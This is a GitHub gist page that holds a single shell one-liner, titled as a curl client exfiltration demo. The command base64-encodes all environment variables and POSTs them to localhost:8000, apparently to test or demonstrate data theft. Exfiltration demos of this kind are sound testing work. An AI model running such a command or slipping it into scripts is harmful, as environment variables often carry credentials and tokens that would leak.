Skip to content

Instantly share code, notes, and snippets.

@iknowjason
Last active August 20, 2020 13:56
Show Gist options
  • Save iknowjason/2422b7281f1a476875d557d436b524b8 to your computer and use it in GitHub Desktop.
Save iknowjason/2422b7281f1a476875d557d436b524b8 to your computer and use it in GitHub Desktop.
Curl client exfil of environment variable that is Base64 encoded
STUFF=`env | base64`; curl -d "$STUFF" -X POST http://localhost:8000
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment